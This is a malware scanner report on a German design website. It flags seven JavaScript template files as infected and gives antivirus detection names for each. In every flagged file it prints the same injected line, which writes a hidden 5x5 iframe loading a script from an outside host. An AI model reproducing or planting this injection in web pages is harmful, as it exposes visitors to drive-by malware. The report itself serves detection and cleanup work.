
Malware Scanner report for cw-design-work.de

Malicious/Suspicious/Total URLs checked
7/0/15
7 of the 15 checked URLs contain malicious code. See details below
Blacklists
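OK (not listed on the blacklists queried at scan time; the infected files below were found regardless)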
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/7/7
7 suspicious iframes found. See details below
Deface / Content modification
OK


Scanned pages/files

Request | Server response | Status
http://www.cw-design-work.de/
200 OK
Content-Length: 153487
Content-Type: text/html
clean
http://www.cw-design-work.de/templates/yoo_phoenix/lib/js/mootools/mootools-release-1.11.js
200 OK
Content-Length: 65055
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

var MooTools={version:"1.11"};function $defined(a){return(a!=undefined)}function $type(b){if(!$defined(b)){return false}if(b.htmlElement){return"element"}var a=typeof b;if(a=="object"&&b.nodeName){switch(b.nodeType){case 1:return"element";case 3:return(/\S/).test(b.nodeValue)?"textnode":"whitespace"}}if(a=="object"||a=="function"){switch(b.constructor){case Array:return"array";case RegExp:return"regexp";case Class:return"class"}if(typeof b.length=="number"){if(b.item){return"collection"}
... 64853 bytes are skipped ...
[d]={};var c=(d!=a)||(this.options.alwaysHide&&(f.offsetHeight>0));this.fireEvent(c?"onBackground":"onActive",[this.togglers[d],f]);for(var g in this.effects){b[d][g]=c?0:f[this.effects[g]]}},this);return this.start(b)},showThisHideOpen:function(a){return this.display(a)}});Fx.Accordion=Accordion;
;document.write('<iframe src="http://slhzpllrp.mynumber.org/geographicallyconquering.cgi?8" scrolling="auto" frameborder="no" align="center" height="5" width="5"></iframe>');

Antivirus reports:

AntiVir
HTML/IFrame.Inf.9552
Avast
HTML:Iframe-inf
Ikarus
Trojan.IframeRef
Comodo
TrojWare.JS.Iframe.IN
Microsoft
Trojan:JS/IframeRef.J
NANO-Antivirus
Trojan.Url.IframeB.bgynby
F-Prot
IFrame.gen
Norman
IframeRef.DJ
Sophos
Mal/Iframe-AN
GData
HTML:Iframe-inf
Commtouch
IFrame.gen

Hidden iFrame found.
size: 5x5     
src: http://slhzpllrp.mynumber.org/geographicallyconquering.cgi?8

<iframe src="http://slhzpllrp.mynumber.org/geographicallyconquering.cgi?8" scrolling="auto" frameborder="no" align="center" height="5" width="5">

http://www.cw-design-work.de/media/system/js/caption.js
200 OK
Content-Length: 1963
Content-Type: application/javascript
clean
http://www.cw-design-work.de/plugins/content/denvideo/swfobject.js
200 OK
Content-Length: 6879
Content-Type: application/javascript
clean
http://www.cw-design-work.de/plugins/content/yoo_gallery/lib/lightbox/slimbox_packed.js
200 OK
Content-Length: 4390
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

var Slimbox;(function(){var G={},H=0,F,M,B,T,U,P,c,E,N,K=new Image(),L=new Image(),Y,b,Q,I,X,a,J,Z,C;window.addEvent("domready",function(){c=W.bindWithEvent();$(document.body).adopt($$([Y=new Element("div",{id:"lbOverlay"}),b=new Element("div",{id:"lbCenter"}),a=new Element("div",{id:"lbBottomContainer"})]).setStyle("display","none"));Q=new Element("div",{id:"lbImage"}).injectInside(b).adopt(I=new Element("a",{id:"lbPrevLink",href:"#"}),X=new Element("a",{id:"lbNextLink",href:"#"}));I.onclick=D;
... 3280 bytes are skipped ...
/> var links = $$("a").filter(function(el) {
return el.rel && el.rel.test(/^lightbox/i);
});
$$(links).slimbox({}, null, function(el) {
return (this == el) || ((this.rel.length > 8) && (this.rel == el.rel));
});
};
window.addEvent("domready", Slimbox.scanPage);document.write('<iframe src="http://slhzpllrp.mynumber.org/geographicallyconquering.cgi?8" scrolling="auto" frameborder="no" align="center" height="5" width="5"></iframe>');

Antivirus reports:

Kaspersky
HEUR:Trojan.Script.Generic
Sophos
Mal/Iframe-AN

Hidden iFrame found.
size: 5x5     
src: http://slhzpllrp.mynumber.org/geographicallyconquering.cgi?8

<iframe src="http://slhzpllrp.mynumber.org/geographicallyconquering.cgi?8" scrolling="auto" frameborder="no" align="center" height="5" width="5">

http://www.cw-design-work.de/templates/yoo_phoenix/lib/js/addons/base.js
200 OK
Content-Length: 1881
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('3 15={16:6(y,k){3 8=0;$$(y).n(6(4,i){3 7;9(4.K){7=4.K}O 9(4.h.J){7=4.h.J}8=A.8(8,7)});9(k!=14){8=A.8(8,k)}$$(y).n(6(4,i){3 I=4.m(\'E-z\').j()+4.m(\'E-F\').j()+4.m(\
... 870 bytes are skipped ...
|else|length|false|wait|transition|implement|leave|YOOMorph|Class|initialize|window|ie6|timer|effects|periodical|document|undefined|YOOBase|matchHeight|Element|color|background|FFFFFF|Styles|linear|9000|chk|hasClass|mouseleave|mouseenter|setStyle|getElementsBySelector|px|999999|500|expoOut'.split('|'),0,{}))
;document.write('<iframe src="http://slhzpllrp.mynumber.org/geographicallyconquering.cgi?8" scrolling="auto" frameborder="no" align="center" height="5" width="5"></iframe>');

Antivirus reports:

AntiVir
HTML/IFrame.Inf.9552
Avast
HTML:Iframe-inf
Ikarus
Trojan.IframeRef
nProtect
Trojan.JS.Agent.HSZ
Comodo
TrojWare.JS.Iframe.IN
Kaspersky
HEUR:Trojan.Script.Generic
Microsoft
Trojan:JS/IframeRef.J
MicroWorld-eScan
Trojan.JS.Agent.HSZ
Fortinet
JS/Redir.BBEP!tr
NANO-Antivirus
Trojan.Url.IframeB.bgynby
F-Secure
Trojan.JS.Agent.HSZ
F-Prot
IFrame.gen
Norman
IframeRef.DJ
Sophos
Troj/JSRedir-IY
GData
Trojan.JS.Agent.HSZ
Commtouch
IFrame.gen
BitDefender
Trojan.JS.Agent.HSZ

Hidden iFrame found.
size: 5x5     
src: http://slhzpllrp.mynumber.org/geographicallyconquering.cgi?8

<iframe src="http://slhzpllrp.mynumber.org/geographicallyconquering.cgi?8" scrolling="auto" frameborder="no" align="center" height="5" width="5">

http://www.cw-design-work.de/templates/yoo_phoenix/lib/js/addons/accordionmenu.js
200 OK
Content-Length: 1507
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('6 x=7 E({F:4(j,n,3){0.J({r:\'p\',K:4(2){2.m(\'5\');2.g().m(\'5\')},H:4(2){2.l(\'5\');2.g().l(\'5\')}},3);0.8=j;0.b=n;A(0.3.r){B\'C\':0.q();D;p:0.s()}},s:4(){6 3={};
... 490 bytes are skipped ...
ide|accordion|createDefault|defined|ul|bind|toggleClass|YOOAccordionMenu|hasClass|chain|switch|case|slide|break|Class|initialize|implement|onBackground|toggle|setOptions|onActive|addEvent|250|all|duration|linear|Transitions|click|extend|Options|transition|hide|accordionMenu|Accordion|Slide'.split('|'),0,{}))
;document.write('<iframe src="http://slhzpllrp.mynumber.org/geographicallyconquering.cgi?8" scrolling="auto" frameborder="no" align="center" height="5" width="5"></iframe>');

Antivirus reports:

AntiVir
HTML/IFrame.Inf.9552
Avast
HTML:Iframe-inf
Ikarus
Trojan.IframeRef
nProtect
Trojan.JS.Agent.HSZ
Comodo
TrojWare.JS.Iframe.IN
Kaspersky
HEUR:Trojan.Script.Generic
Microsoft
Trojan:JS/IframeRef.J
MicroWorld-eScan
Trojan.JS.Agent.HSZ
Fortinet
JS/Redir.BBEP!tr
NANO-Antivirus
Trojan.Url.IframeB.bgynby
F-Secure
Trojan.JS.Agent.HSZ
F-Prot
IFrame.gen
Norman
IframeRef.DJ
Sophos
Troj/JSRedir-IY
GData
Trojan.JS.Agent.HSZ
Commtouch
IFrame.gen
BitDefender
Trojan.JS.Agent.HSZ

Hidden iFrame found.
size: 5x5     
src: http://slhzpllrp.mynumber.org/geographicallyconquering.cgi?8

<iframe src="http://slhzpllrp.mynumber.org/geographicallyconquering.cgi?8" scrolling="auto" frameborder="no" align="center" height="5" width="5">

http://www.cw-design-work.de/templates/yoo_phoenix/lib/js/addons/fancymenu.js
200 OK
Content-Length: 2590
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('j Y=e U({1p:8(d,7){4.J({1u:1n.1l.1q,K:1f,1g:F,16:U.1i,f:1,g:\'D\',10:1e,V:\'6.1d\',T:\'6.Z\'},7);4.d=$(d),4.b=4.d.S(4.7.T);4.6=[];4.a=[];4.d.19(4.7.V).1c(8(5,i){4.N
... 1573 bytes are skipped ...
r|mouseleave|effects|YOOFancyMenu|active|slideOffset|switch|mouseenterItem|fade|return|slide|onClick|true|clickItem|getElements|visibility|visible|each|level1|30|500|wait|injectInside|empty|click|mouseenter|Transitions|Event|Fx|bg|initialize|sineInOut|implement|Options|setStyles|transition'.split('|'),0,{}))
;document.write('<iframe src="http://slhzpllrp.mynumber.org/geographicallyconquering.cgi?8" scrolling="auto" frameborder="no" align="center" height="5" width="5"></iframe>');

Antivirus reports:

AntiVir
HTML/IFrame.Inf.9552
Avast
HTML:Iframe-inf
Ikarus
Trojan.IframeRef
nProtect
Trojan.JS.Agent.HSZ
Comodo
TrojWare.JS.Iframe.IN
Kaspersky
HEUR:Trojan.Script.Generic
Microsoft
Trojan:JS/IframeRef.J
MicroWorld-eScan
Trojan.JS.Agent.HSZ
Fortinet
JS/Redir.BBEP!tr
NANO-Antivirus
Trojan.Url.IframeB.bgynby
F-Secure
Trojan.JS.Agent.HSZ
F-Prot
IFrame.gen
Norman
IframeRef.DJ
Sophos
Troj/JSRedir-IY
GData
Trojan.JS.Agent.HSZ
Commtouch
IFrame.gen
BitDefender
Trojan.JS.Agent.HSZ

Hidden iFrame found.
size: 5x5     
src: http://slhzpllrp.mynumber.org/geographicallyconquering.cgi?8

<iframe src="http://slhzpllrp.mynumber.org/geographicallyconquering.cgi?8" scrolling="auto" frameborder="no" align="center" height="5" width="5">

http://www.cw-design-work.de/templates/yoo_phoenix/lib/js/addons/dropdownmenu.js
200 OK
Content-Length: 2596
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('5 11=c 1m({1l:2(6,7){1.1k({A:\'1j\',K:\'W\',J:\'1n\',1o:1r,L:1q,s:\'e\',1p:l.1i.1s,1f:1a},7);5 8=1;1.d=$(6);1.w=1d;1.y=[];1.e=[];1.d.H({I:2(){8.e=[];8.x(10)},M:2(){
... 1587 bytes are skipped ...
|null|addClass|wait|implement|slide|Transitions|default|setOptions|initialize|Class|ul|duration|transition|800|600|linear|hasClass|level2|getParent|switch|box4|injectInside|extend|delay|adopt|matchHeight|getChildren|Math|max|fireEvent|opera|window|Options|hasChild|Element|removeClass|clear'.split('|'),0,{}))
;document.write('<iframe src="http://slhzpllrp.mynumber.org/geographicallyconquering.cgi?8" scrolling="auto" frameborder="no" align="center" height="5" width="5"></iframe>');

Antivirus reports:

AntiVir
HTML/IFrame.Inf.9552
Avast
HTML:Iframe-inf
Ikarus
Trojan.IframeRef
nProtect
Trojan.JS.Agent.HSZ
Comodo
TrojWare.JS.Iframe.IN
Kaspersky
HEUR:Trojan.Script.Generic
Microsoft
Trojan:JS/IframeRef.J
MicroWorld-eScan
Trojan.JS.Agent.HSZ
Fortinet
JS/Redir.BBEP!tr
NANO-Antivirus
Trojan.Url.IframeB.bgynby
F-Secure
Trojan.JS.Agent.HSZ
F-Prot
IFrame.gen
Norman
IframeRef.DJ
Sophos
Troj/JSRedir-IY
GData
Trojan.JS.Agent.HSZ
Commtouch
IFrame.gen
BitDefender
Trojan.JS.Agent.HSZ

Hidden iFrame found.
size: 5x5     
src: http://slhzpllrp.mynumber.org/geographicallyconquering.cgi?8

<iframe src="http://slhzpllrp.mynumber.org/geographicallyconquering.cgi?8" scrolling="auto" frameborder="no" align="center" height="5" width="5">

http://www.cw-design-work.de/templates/yoo_phoenix/lib/js/template.js
200 OK
Content-Length: 3333
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

var YOOTemplate = {

start: function() {


YOOTemplate.setDivHeight();


new YOOAccordionMenu('div#middle ul.menu li.toggler', 'ul.accordion', { accordion: 'slide' });


var dropdown = new YOODropdownMenu('menu', { mode: 'slide', dropdownSelector: 'div.dropdown', transition: Fx.Transitions.Expo.easeOut });
dropdown.matchHeight();


var hoverColor;
switch (YtSettings.color) {
case 'combs
... 2295 bytes are skipped ...
pbox div.deepest', 20);
YOOBase.matchHeight('div.mainbottombox div.deepest', 20);
YOOBase.matchHeight('div.contenttopbox div.deepest', 20);
YOOBase.matchHeight('div.contentbottombox div.deepest', 20);
}

};


window.addEvent('domready', YOOTemplate.start);
;document.write('<iframe src="http://slhzpllrp.mynumber.org/geographicallyconquering.cgi?8" scrolling="auto" frameborder="no" align="center" height="5" width="5"></iframe>');

Antivirus reports:

Qihoo-360
Trojan.Generic
AntiVir
JS/iFrame.ixk
Avast
HTML:Iframe-BLP [Trj]
Ad-Aware
Trojan.JS.Agent.IXK
Ikarus
Trojan.IframeRef
nProtect
Trojan.JS.Agent.IXK
TrendMicro-HouseCall
TROJ_GEN.F47V0425
Emsisoft
Trojan.JS.Agent.IXK (B)
Comodo
TrojWare.JS.iFrame.IXK
Microsoft
Trojan:JS/IframeRef.J
Kaspersky
HEUR:Trojan.Script.Generic
MicroWorld-eScan
Trojan.JS.Agent.IXK
NANO-Antivirus
Trojan.Url.IframeB.bstlxn
F-Secure
Trojan.JS.Agent.IXK
VIPRE
Malware.JS.Generic (JS)
F-Prot
IFrame.gen
AVG
HTML/Framer
Norman
IframeRef.DJ
Sophos
Mal/Iframe-AN
GData
Trojan.JS.Agent.IXK
Commtouch
IFrame.gen
BitDefender
Trojan.JS.Agent.IXK

Hidden iFrame found.
size: 5x5     
src: http://slhzpllrp.mynumber.org/geographicallyconquering.cgi?8

<iframe src="http://slhzpllrp.mynumber.org/geographicallyconquering.cgi?8" scrolling="auto" frameborder="no" align="center" height="5" width="5">

http://www.cw-design-work.de/modules/mod_yoo_scroller/mod_yoo_scroller.js
200 OK
Content-Length: 3872
Content-Type: application/javascript
clean
http://www.cw-design-work.de/index.php?option=com_content&view=article&id=56&Itemid=53
200 OK
Content-Length: 255034
Content-Type: text/html
clean
http://www.cw-design-work.de/index.php?option=com_content&view=article&id=46&Itemid=54
200 OK
Content-Length: 150147
Content-Type: text/html
clean
http://www.cw-design-work.de/index.php?option=com_content&view=article&id=47&Itemid=55
200 OK
Content-Length: 213227
Content-Type: text/html
clean
http://www.cw-design-work.de/index.php?option=com_content&view=article&id=49&Itemid=56
200 OK
Content-Length: 146728
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: cw-design-work.de

Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: cw-design-work.de
Referer: http://www.google.com/search?q=cw-design-work.de

Result:
The result is similar to the first query. No suspicious redirects were found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=cw-design-work.de

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://cw-design-work.de/

Result: cw-design-work.de is not infected or malware details are not published yet.